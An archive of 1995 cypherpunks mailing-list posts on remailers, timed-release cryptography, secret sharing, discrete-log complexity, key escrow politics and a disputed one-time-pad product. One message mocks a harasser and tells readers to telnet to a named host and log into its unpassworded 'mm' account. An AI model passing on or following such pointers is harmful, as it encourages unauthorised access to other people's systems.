David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco at itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/





From m.landicho at biology.bbk.ac.uk  Mon Nov 13 10:43:28 1995
From: m.landicho at biology.bbk.ac.uk (Mary Rose)
Date: Tue, 14 Nov 1995 02:43:28 +0800
Subject: unsuscribe all news groups
Message-ID: <ECS9511131814A@ccs.bbk.ac.uk>


I wish to unsuscribe to all news groups as I feel I should be on a different planet.  
Could somebody notify all newsgroups on on my behalf please.

Sincerely yours









From jcobb at ahcbsd1.ovnet.com  Mon Nov 13 10:57:43 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 14 Nov 1995 02:57:43 +0800
Subject: New World Encryption
Message-ID: <Pine.BSD.3.91.951110214435.24482E-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
An item in 11 09 95 Edupage summarizes a NY Times new- 
sstory revealing Clinton's wish to spy on the world: 
 
OPPOSITION TO ADMINISTRATION'S ENCRYPTION STAND 
 
A coalition of 37 major U.S. technology companies has re- 
jected the Clinton Administration's proposed standard for 
data encryption, saying that they found Administration of- 
ficials unwilling to compromise. 
 
The government wants an encryption plan that will allow it 
to gather intelligence overseas, through the use of a key 
                       ^^^^^^^^ 
escrow encryption system. 
 
The high-tech companies want an encryption standard that 
would ensure privacy for both domestic and overseas users. 
                         ^^^^              ^^^^^^^^ 
(New York Times 8 Nov 95 C3) 
 
Their opposition to the Administration's plan has been joined 
by 12 conservative organizations who call it anti-consumer, 
anti-marketplace, and anti-progress.  (New York Times9 Nov 
95 C3) 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  To subscribe to Edupage: send a message to: 
 
                  listproc at educom.unc.edu 
 
       and in the body of the message type: 
 
    subscribe edupage <your first name> <your last name> 
 
 






From perry at alpha.jpunix.com  Mon Nov 13 11:08:09 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Tue, 14 Nov 1995 03:08:09 +0800
Subject: Current list of Remailers
Message-ID: <199511110131.TAA00538@alpha.jpunix.com>


Hello Everyone,

	Since Raph annonced his new Type-II remailer list, I just
wanted to let everyone know that I have updated the type2.list and
pubring.mix files on jpunix.com to reflect the most up-to-date status
of the Type-II Mixmaster remailers, You can connect to
http://www.jpunix.com or ftp to ftp.jpunix.com to get the latest
configuration files.

 John Perry - KG5RG - perry at alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry at jpunix.com is on the keyservers.






From bianco at itribe.net  Mon Nov 13 11:12:17 1995
From: bianco at itribe.net (David J. Bianco)
Date: Tue, 14 Nov 1995 03:12:17 +0800
Subject: New feature for the Cryptography Technical Report Server
Message-ID: <199511131840.NAA21640@gatekeeper.itribe.net>


Yes, it's still there!  8-)  I posted a note to this list a few months ago
announcing that I had set up such a service, and though we've only got a 
few reports I'm up to a couple o' hundred visitors a week.  To me, the amount
of activity indicates interest in the subject, but the lack of reports
tells me that either authors are not interested in contributing, it's 
too difficult to contribute, or they don't know about service.  

I took some time this weekend and wrote a script to handle online submissions.
This should make things easier on the authors, I think.  If you have
a technical report, journal article or book you'd like to index in CTRS
(abstract only submissions are supported as well as full-text submission),
point your browser at:

	http://www.itribe.net/CTRS/add-entry.cgi

If you try this, please let me know how you liked it.  I'm interested in 
making the submissions process as painless as possible.  

As always, the main CTRS page is

	http://www.itribe.net/CTRS/
		or
	https://www.itribe.net/CTRS/



-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco at itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/





From jim at acm.org  Mon Nov 13 11:22:33 1995
From: jim at acm.org (Jim Gillogly)
Date: Tue, 14 Nov 1995 03:22:33 +0800
Subject: coding and nnet's
In-Reply-To: <acc933c500021004a249@[205.199.118.202]>
Message-ID: <199511110125.RAA04930@mycroft.rand.org>



> tcmay at got.net (Timothy C. May) writes:
> At 7:52 PM 11/10/95, Bill Stewart wrote:

>>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>>cryptography, primarily because of the shape of the solution space.
>>Neural nets work best for problems that have a continuity of solutions,
>>some better than others.  This allows a neural net to learn, proposing
>>better and better solutions as it does.  Breaking an algorithm provides
>>for very little in the way of learning opportunities:  You either recover
>>the key or you don't. (At least this is true if the algorithm is any
>>good.) Neural nets work well in structured environments when there is
>>something to learn, but not in the high-entropy, seemingly random world of
>>cryptography."
>>And he doesn't give any references.
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> This paragraph sounds a _lot_ like what I wrote in sci.crypt a while back
> on the usefullness of AI and neural nets for crypto. Sounds almost like
> exactly the paragraph I wrote, in fact.

As it happens, I saved that one, because I thought the "needle standing up
from a flat plain" metaphor was so apt; I've used it in a couple of talks
without remembering where I got it.  Here's your message to sci.crypt:

  From: tcmay at netcom.com (Timothy C. May)
  Subject: Re: Neural nets & Crypto
  Message-Id: <tcmayCuBz0q.739 at netcom.com>
  Date: Wed, 10 Aug 1994 17:53:13 GMT

  Neural nets are not likely to do well with modern ciphers (e.g., RSA,
  IDEA, DES, etc.), mainly because of the shape of the solution space.

  Instead of the "rolling hills and valleys" that neural nets (and
  related methods, such as genetic algorithms, simulated annealing,
  etc.) do well in, the solution space for modern ciphers offers very
  little in the way of "learning" opportunities: you either have the
  solution (the key), or you don't.

  Think of a needle standing up from a flat plain...a NN or any other
  hill-climber could wander for years and never find it.

  I suspect there are uses in peripheral aspects, such as guessing
  passwords (when people have not picked high-entropy passwords, but
  have instead used familiar names). Or in traffic analysis.

  But the move in modern cryptology is definitely away from using
  anything with "structure" that can be learned. Put another way, neural
  nets and such work well in structured environments, where there's
  something to _learn), but not in the high-entropy, seemingly random
  world of encrypted data.

  --Tim May

A subsequent message (which I also saved) dealt with genetic programming
and was also interesting.

	Jim Gillogly
	21 Blotmath S.R. 1995, 01:22





From mark at grondar.za  Mon Nov 13 11:24:53 1995
From: mark at grondar.za (Mark Murray)
Date: Tue, 14 Nov 1995 03:24:53 +0800
Subject: unsuscribe all news groups
Message-ID: <199511131855.UAA00152@grumble.grondar.za>


> I wish to unsuscribe to all news groups as I feel I should be on a different 
planet.  
> Could somebody notify all newsgroups on on my behalf please.
> 
> Sincerely yours

Please send a one line message containing only

HELP

to majordomo at toad.com to get help on doing this.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark at grumble.grondar.za for PGP key





From amir at watson.ibm.com  Mon Nov 13 11:32:33 1995
From: amir at watson.ibm.com (Amir Herzberg)
Date: Tue, 14 Nov 1995 03:32:33 +0800
Subject: Timed-release crypto - Proactive security plug
In-Reply-To: <v02120d01acc4eb3a6eb1@[199.0.65.105]>
Message-ID: <9511131904.AA21605@gimili.watson.ibm.com>



A small note/plug: the schemes by Tim and Michael are based on `long lived'
secret sharing, i.e. you trust each share of your secret to a server for a
really long time. Some people may be concerned that such a long time would
allow an attacker to break into most servers and reconstruct the secret (key).

A solution to this is proactive secret sharing, as described in [HJKY95].
In this protocol, the secret shares are periodically refreshed (i.e. new
shares are computed distributively and then the old shares are erased).
In this manner, an attacker has to break into most servers during the same
period; shares from one period are worthless on the next period.

Best, Amir

[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
M. Yung, Crypto 95.

> At 12:09 AM 11/7/95, Michael Shields wrote:
>
> >In the May proposal, when you have a message to be encrypted, you
> >encrypt it with a session key, optionally split that key with an n-of-m
> >scheme, and then send the key into a network of escrow agents, which are
> >instructed to hold the message for a given period of time.  You then
> >hold onto the encrypted message, though you need not keep it secret.
> >Conceptually, you have encrypted a message and then remailed the key to
> >yourself in such a way that it will take X length of time to arrive.
>

> --Tim May
>
> Views here are not the views of my Internet Service Provider or Government.

How do you know that?   :-)






From m5 at dev.tivoli.com  Mon Nov 13 11:59:49 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Tue, 14 Nov 1995 03:59:49 +0800
Subject: unsuscribe all news groups
In-Reply-To: <199511131855.UAA00152@grumble.grondar.za>
Message-ID: <9511131928.AA21826@alpha>



Mary Rose wrote:
 > > I wish to unsuscribe ...
 > 
 > Please send a one line message ...


Hmm...  I was going to suggest asking Yvette.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From tcmay at got.net  Mon Nov 13 12:21:41 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 04:21:41 +0800
Subject: Timed-release crypto - Proactive security plug
Message-ID: <acccdebc040210049a7f@[205.199.118.202]>


At 7:03 PM 11/13/95, Amir Herzberg wrote:
>A small note/plug: the schemes by Tim and Michael are based on `long lived'
>secret sharing, i.e. you trust each share of your secret to a server for a
>really long time. Some people may be concerned that such a long time would
>allow an attacker to break into most servers and reconstruct the secret (key).
>
>A solution to this is proactive secret sharing, as described in [HJKY95].
>In this protocol, the secret shares are periodically refreshed (i.e. new
>shares are computed distributively and then the old shares are erased).
>In this manner, an attacker has to break into most servers during the same
>period; shares from one period are worthless on the next period.
>
>Best, Amir
>
>[HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
>M. Yung, Crypto 95.

I also was sent a copy of Ron Rivest's latest paper on timed-release crypto
(also available at the URL http://theory.lcs.mit.edu/~rivest/).

These noted cryptographers, Amir, Ron, and others, are of course doing
"real cryptography" on this timed-released stuff....my speculations in '93
and later are informal, rough considerations. There are dangers in using
"common sense" in protocols like this, but, then, few of us have the time
to explore things in enough detail.

I just wanted to clarify things, though I suspect most of you know that
many of my arguments (and those of others, too) are based on informal, bull
session, sorts of foundations. This is often enough at a very early stage.
No substitute for much more rigorous, published-paper-quality analyses, of
course.

>> --Tim May
>>
>> Views here are not the views of my Internet Service Provider or Government.
>
>How do you know that?   :-)

In the past, I have actually gotten warning letters from some of my
Internet Service Providers saying that my views were inimical to their own
views. One provider, who shall remain nameless, actually *turned off* my
access to NetNews until I agreed to post a clarification that the views I
was expressing were not his views!

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From j.fletcher at psych.stir.ac.uk  Mon Nov 13 12:32:02 1995
From: j.fletcher at psych.stir.ac.uk (Jonathon Fletcher)
Date: Tue, 14 Nov 1995 04:32:02 +0800
Subject: Q: Bookshop in Seattle
Message-ID: <Pine.HPP.3.91.951111082012.10146A-100000@loyal.stir.ac.uk>



  Can someone point me towards a bookshop in Seattle that is likely to
have the second edition of Applied Cyptography ? 

Sincerely,

-Jon

--
  Jonathon Fletcher, 
  j.fletcher at stirling.ac.uk 







From sameer at c2.org  Mon Nov 13 12:33:28 1995
From: sameer at c2.org (sameer)
Date: Tue, 14 Nov 1995 04:33:28 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <199511110843.AAA18344@infinity.c2.org>


> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

	Suppose you die.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org





From wilcoxb at nagina.cs.colorado.edu  Mon Nov 13 12:38:46 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Tue, 14 Nov 1995 04:38:46 +0800
Subject: Who needs time vaults anyway?
Message-ID: <199511110715.AAA21835@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

I don't really understand the use for "can't be opened until
Christmas" tricks.  If you don't want anyone to see your info until
Christmas then just don't give them a copy until then!  If you want
to prove that you have it but not let them see it until later then
do timestamping of hashes, zero-knowledge proofs and so forth.


Can anyone explain what use this theoretical "time-sensitive" crypto
box would be good for?


Regards,

Bryce

signatures follow

            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce at colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKRNe/WZSllhfG25AQGXxAP9HuZU4tJZ92c4keUHbpSNjWcwyYhTOOWA
Atz/Ej8y0Q6xAwRdr2ggqYc7tgWUGMjGZy0vIoET9W6ofkXXnyZzUIFACzXuS7IK
8xOV740ShvnX//5j8x1TMOJuykRNrs0+y8eZI8gDLQ5R1vEEbv7JkmsVVUgdZpau
WMR6cG/9qu4=
=v4q/
-----END PGP SIGNATURE-----





From ahupp at primenet.com  Mon Nov 13 12:42:06 1995
From: ahupp at primenet.com (Adam Hupp)
Date: Tue, 14 Nov 1995 04:42:06 +0800
Subject: Register
Message-ID: <199511120442.VAA08265@usr2.primenet.com>


>From: viking at pacifier.com (Robert East)
>Date: Wed, 08 Mar 1995 22:46:45 -0800
>Subject: Register
>
>Register
>
>I'd like to sign up for email
>
>Bob

I'd like to sign up for a clue
 
Thanks!

:)

_____________________________________________________________

"We work in the dark  We do what we can  We give what we have
Our doubt is our passion  And our passion is our task   
The rest is the madness of art."  
                   --Henry James
___________________________________________________________






From bdavis at thepoint.net  Mon Nov 13 12:47:25 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Tue, 14 Nov 1995 04:47:25 +0800
Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511111547.HAA08706@blob.best.net>
Message-ID: <Pine.D-G.3.91.951112031903.23834C-100000@dg.thepoint.net>


On Fri, 10 Nov 1995, James A. Donald wrote:

> At 05:15 PM 11/8/95 -0500, ACLUNATL at aol.com wrote:
> > According to the government's own statistics, 1,800 innocent conversations
> > are intercepted each and every time a wiretap or other form of electronic
> > surveillance is placed.
> 
> This seems curiously inefficient, even for government work.

Not at all.  When a wiretap goes up, agents listen to every call that 
goes to or from the phone.  If the call doesn't relate to anything 
"criminal," they must "minimize" the interception by not listening.  They 
can listen again after some minutes to see if the topic has changed.

The pre-wiretap minimization conference for agents is taken very 
seriously by ethical prosecutors (not an oxymoron for those who ask).  
Good agents (ditto) also take the briefing seriously.

EBD





From bdavis at thepoint.net  Mon Nov 13 12:52:58 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Tue, 14 Nov 1995 04:52:58 +0800
Subject: Timed-release crypto - Proactive security plug
In-Reply-To: <acccdebc040210049a7f@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.951113151455.7281B-100000@dg.thepoint.net>


On Mon, 13 Nov 1995, Timothy C. May wrote:

> At 7:03 PM 11/13/95, Amir Herzberg wrote:
>  ... 
> >> --Tim May
> >>
> >> Views here are not the views of my Internet Service Provider or Government.
> >
> >How do you know that?   :-)
> 
> In the past, I have actually gotten warning letters from some of my
> Internet Service Providers saying that my views were inimical to their own
> views. One provider, who shall remain nameless, actually *turned off* my
> access to NetNews until I agreed to post a clarification that the views I
> was expressing were not his views!
> 
And, being personally familiar on the Government's position on many of 
the issues discussed here, I can certify that many/most/all of Tim's 
views are not the views of the United States government!

EBD

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!






From tcmay at got.net  Mon Nov 13 13:07:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 14 Nov 1995 05:07:15 +0800
Subject: "Not the views of my government"
Message-ID: <accce9d900021004d7ca@[205.199.118.202]>


At 8:16 PM 11/13/95, Brian Davis wrote:

>And, being personally familiar on the Government's position on many of
>the issues discussed here, I can certify that many/most/all of Tim's
>views are not the views of the United States government!


Indeed. Though many would argue that some (large) fraction of the views I
and others express are right in line with the views of the Founders.

Certainly Jefferson, Franklin, Henry, and others would be aghast at the
modern interpretations of the Constitution.

"What do you mean my inn may not allow smoking? Surely it is up to
customers to freely choose to enter my inn or not enter my inn."

"What do you mean I must hire fixed quotas of various ethnic and racial
groups, no matter my preferences?"

"How can the government command me to pay more for a worker than I wish to
freely pay?"

"Why are these things you call helicopters flying over my farm at all
hours? if they are looking for "illegal crops," why is this their concern?
Why do they subsidize tobacco production? Why is government paying farmers
to grow some crops and not to grow other crops?"

"What, pray tell, is this "key escrow" business? Do we no longer have
protections against unlawful search? Are our papers and conversations now
to be "escrowed" with the King's men? What country have I been brought back
into?"

"I am just an ignorant Founder; I know not the ways of your strange land."


--Timothy Jefferson May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From weidai at eskimo.com  Mon Nov 13 13:26:24 1995
From: weidai at eskimo.com (Wei Dai)
Date: Tue, 14 Nov 1995 05:26:24 +0800
Subject: Diffie-Hellman in GF(2^n)?
In-Reply-To: <Pine.SUN.3.91.951112224949.24714A-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951113123310.24760A-100000@eskimo.com>


I wrote earlier:

> Thanks for the reference.  The paper gives a running time of exp(c(n 
> log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) 
> for discrete log in GF(2^n).  However, this paper was published in 1985. 
> There is now an algorithm to calculate discrete logs in GF(p) in
> exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same
> directory), so perhaps GF(2^n) isn't so bad after all. 

To clarify my earlier post, although both of the latter two algorithms
have a runtime of the form exp(c*n^(1/3)*(log n)^(2/3)), for GF(p)
c=1.922+o(1), for GF(2^n) c=1.405+o(1).  This seems to imply that if 
GF(2^n) is to be used, n needs to be 2.56*log p to achieve a comparable 
level of security to using GF(p).  (2.56=1.922^3/1.405^3)

Wei Dai





From abacard at well.com  Mon Nov 13 13:28:24 1995
From: abacard at well.com (Andre Bacard)
Date: Tue, 14 Nov 1995 05:28:24 +0800
Subject: URL Version for ALPHA.C2.ORG FAQ
Message-ID: <199511111848.KAA22368@well.com>


Hello Remailer Users,
 
Due to popular demand, I've created a URL version of my ALPHA.C2.ORG
Remailer FAQ. Please link to this address:
 
      http://www.well.com/user/abacard/alpha.html
 
See you in the future,
Andre Bacard
======================================================================
abacard at well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
http://www.well.com/user/abacard    Published by Peachpit Press, (800)
Enjoy your privacy...               283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
 





From beavis at bioanalytical.com  Mon Nov 13 13:31:38 1995
From: beavis at bioanalytical.com (Beavis B. Thoopit)
Date: Tue, 14 Nov 1995 05:31:38 +0800
Subject: Timed-release crypto - Proactive security plug
In-Reply-To: <9511131904.AA21605@gimili.watson.ibm.com>
Message-ID: <199511132053.PAA01851@bioanalytical.com>


[...]

> A solution to this is proactive secret sharing, as described in [HJKY95].
> In this protocol, the secret shares are periodically refreshed (i.e. new
> shares are computed distributively and then the old shares are erased).
> In this manner, an attacker has to break into most servers during the same
> period; shares from one period are worthless on the next period.
> 
> Best, Amir
> 
> [HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski,
> M. Yung, Crypto 95.

[...]

Here is an example of _dynamics_ being used to increase the security of
a logical protocol.  I believe that dynamics may be usable at a more micro
level to build a physical device that is expensive to compromise...





From nobody at REPLAY.COM  Mon Nov 13 13:33:18 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Tue, 14 Nov 1995 05:33:18 +0800
Subject: POTP Security
Message-ID: <199511111919.UAA08790@utopia.hacktic.nl>



   We ordered POTP based on the initial blurbs by Kahn and
   others. It took a while to get it, we talked to Elementrix
   HQ and got voicemail, stutters and recordings saying be
   patient. We read c'punks' slash and burns in the waiting
   period. When the boxes appeared, we read the extra-thin
   documents -- mostly PR gush -- reflected, decided to leave
   the red white and blue boxes At No Time Padded.

   Later a POTP distributer's rep called to ask how we like
   the product. We said, haven't tried it, because we learned
   a bit from reading cryptography lists. We wondered if he
   knew what was being said.

   He said, yes, we know, but they're all wrong, it's a
   fabulous product, totally secure.

   How you gonna prove it, we asked, to consumers like us who
   don't know who to believe? You know, we're reading more
   these days about hacks of cryptography and we want to know
   more than press releases. The people you're citing for
   endorsement aren't cryptographers.

   Yes, he said, that's what we're hearing, that's why I'm
   calling you, we looking for users to endorse the program
   while we're waiting for patent approvals, and trying to get
   the crypto authorities to sign NDA's.

   Sorry, we said, we're can't take a chance on your product.
   Call us back after you get the crypto fuck-authorities to
   hack at it in public.













From wilcoxb at nagina.cs.colorado.edu  Mon Nov 13 13:33:21 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Tue, 14 Nov 1995 05:33:21 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <199511111953.MAA26503@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

 Bryce wrote:
>
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?


 Sameer wrote:
> 
> 	Suppose you die.


Hey!  Who do you think you are?


:-)


Just kidding.  When I woke up this morning I realized what I was
missing:  the decryption might be out of your hands, such as when
you die, or you might *want* it to be out of your hands for some
other reason.


With that in mind, I can think of only one unalterable lower-limit
on the time of as decryption--  the speed of light.  Suppose you
encrypt your data with successive layers of keys, K1-Kn.  Then you
encrypt each key with its predecessor, encrypting Kn with Kn-1,
encryping Kn-1 with Kn-2, etc.  Destroy all copies of unencrypted
keys except for K1, which has not been encrypted.  Now put all
odd-numbered keys in location A and all even-numbered keys in
location B, which is 1 light minute from location A.  Once an agent
has received Key 1, it will take at least n minutes to decrypt 
the data.  Of course, the agent could just take copies of all of the 
keys from location B on some physical media and transport the media 
to location A, which would make the lower bound on time to be "much 
longer than 1 minute".


Hm.  Suppose the n different keys are in n different physical
locations, and the agent does not know where the k+1 location is
until he decrypts the material at the k location.  The "scavenger
hunt" scheme for timed decryption.  Of course this doesn't mean that
you have to bury your crypto box and make a map with an "X" marking
the spot.  Each key could be held by a crypto box which is
publically accessible on the Net.  The important thing is that
the decrypting agent can't retrieve the k+1 piece until he has 
decrypted the k piece.  Then the lower bound on time of decryption 
is...  um...  Well it depends on the location of the decrypting agent 
with respect to the locations of the n pieces.  (Neglecting, still, 
transmission overhead and decryption time.)  I'm not sure what the 
lower bound actually is, but it can be increased simply by adding more 
pieces to the puzzle.


A single station could serve up multiple pieces.  It would only
reveal the k piece if the querying agent can prove that he has the 
k-1 piece.  Of course if the total number of stations is small then 
the "physically move the pieces" trick might work.


Bryce

signatures follow

            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce at colorado.edu                   </a>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKT/JPWZSllhfG25AQFDlwQAhWHB//NeYM8vylQcBDWbNmScrVoCjUdR
TmXVDtnLCZcrAv233l+H3SpdEQmMwQwQCQrM52AreQWMYTSBLuxqr7j9SbpZjek2
FFCMDezbvBPX3ZIuX3SVwrdHa6dm4qgGtpKyfFHxDAn39p+T/HJ+uKaZbA7YVbTC
U6NnnfYv1k8=
=/2+H
-----END PGP SIGNATURE-----





From liberty at gate.net  Mon Nov 13 13:36:40 1995
From: liberty at gate.net (Jim Ray)
Date: Tue, 14 Nov 1995 05:36:40 +0800
Subject: unsuscribe all news groups [NOISE]
Message-ID: <199511132103.QAA30498@tequesta.gate.net>


-----BEGIN PGP SIGNED MESSAGE-----

Someone wrote:

>
>I wish to unsuscribe to all news groups as I feel I should be on a different >planet.

The planet of the clues.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKex/m1lp8bpvW01AQEvdAQAqjSV16hsO3mvGF71I1UkD9Ti/scw5slg
yd51BAttoIb7qDMox7W6ofBAaRW9YrJuD2hoU+/FGJMecEDgsjGnZgcPO2joh4AF
zJD4RU3a2VnEHzKRL+n9xQEtzn6Swo+rnDpRmJKtWso9jpUNXkasl9VTvVRzhf78
hweN2FR/nN4=
=4bJ9
-----END PGP SIGNATURE-----
Regards, Jim Ray

"...the politicians have been arguing over whether to increase the
   budget enormously or just hugely. The news media refer to this
   process as 'cutting' the budget." -- Dave Barry

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty at gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From karn at qualcomm.com  Mon Nov 13 13:48:20 1995
From: karn at qualcomm.com (Phil Karn)
Date: Tue, 14 Nov 1995 05:48:20 +0800
Subject: Photuris Primality verification needed
In-Reply-To: <199511081704.JAA07274@qualcomm.com>
Message-ID: <199511090337.TAA04357@servo.qualcomm.com>


>I don't know.  Maybe the right thing to do is require conforming
>implementations to support a large modulus but include recommended
>smaller moduli.  Then Alice can always force Bob to use the large
>modulus but, if both agree, they can use something smaller from the
>standard or even their own home-grown modulus.

Thanks. That's pretty much what we are doing -- requiring a particular
1024-bit modulus but recommending several others as options. There's a
2048 bit optional modulus and may even be a 4096-bit option if I can
find one in reasonable time. There was going to be a 512-bit optional
modulus but the group has reacted so strongly to it that I'm willing to
withdraw it.

Phil






From jsw at netscape.com  Mon Nov 13 13:57:26 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Tue, 14 Nov 1995 05:57:26 +0800
Subject: POTP Security
In-Reply-To: <30A78DA4@mailer2>
Message-ID: <30A7B5A1.59C7@netscape.com>


Paul Koning 1695 wrote:
> 
> > From: Paul Jackman <jacktech at delphi.com>
> >Newgroups: talk.politics.crypto
> > Subject: Re: Elementrix One-Time Pad
> >..
> > The algorithm will be published when patent protection is assured.
> > It is currently patent pending in several countries.
> 
> I saw that comment earlier.  It's rather a curious statement, given that the
> rule of publication vs. patents is that publication before FILING kills
> your ability to get the patent (in most countries) whereas publication
> after filing but before grant is not an issue at all.  This explains why
> you often see a mad scramble in companies when something
> patentable is about to be announced at a trade show, or explained
> in a white paper... the filing has to be in the mail before that happens.
> But only just before... whether the patent office takes days or years
> to grant the patent doesn't matter.

  I would guess that they are choosing to be cautious so that if their
patent is rejected they can still maintain it as a trade secret.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From turner at TeleCheck.com  Mon Nov 13 14:12:04 1995
From: turner at TeleCheck.com (turner at TeleCheck.com)
Date: Tue, 14 Nov 1995 06:12:04 +0800
Subject: Tenticle: Yvette and unsuscribe all news groups
In-Reply-To: <9511131928.AA21826@alpha>
Message-ID: <9511132140.AA22158@mercury.telecheck.com>


> 
> Mary Rose wrote:
>  > > I wish to unsuscribe ...
>  > 
>  > Please send a one line message ...
> 
> 
> Hmm...  I was going to suggest asking Yvette.
> 

Hmm.. the tenticle has been sending my death threats; this
tenticle has a difficult time spelling "killed" correctly.

Instructions for creating your own tenticle:

telnet to vabeach.email.net and try to log into the unpassworded
account 'mm'.  This was obviously a BBS to increase the sysops
chances for landing a human date.  Hmmmm...







From jcobb at ahcbsd1.ovnet.com  Mon Nov 13 14:12:28 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 14 Nov 1995 06:12:28 +0800
Subject: New World Encryption
In-Reply-To: <acc9550f0102100474a5@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951110231009.24482G-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
Someone writes: 
 
 We are already becoming a kind of "automatic cc:" for a 
 variety of announcements, spams, and other earthshatter- 
 ing items. 
 
 
Someone may wish to include among these the document "Wel- 
come to the cypherpunks mailing list!" 
 
If so, then before he discards it, here are some excerpts 
from that document: 
 
 ...cypherpunks deals with technical details but slants the 
 discussion toward their social implications. 
 
 ...the debates on this list are about how to best get crypto 
 out there. 
 
 Cypherpunks do not seek to prevent other people from speak- 
 ing about their experiences or their opinions.
 
 Cypherpunks hope that all people desiring privacy will learn 
 how best to defend it. 
 
 
Cordially, 
 
Jim 
 





From jcobb at ahcbsd1.ovnet.com  Mon Nov 13 14:16:40 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 14 Nov 1995 06:16:40 +0800
Subject: POTP Security
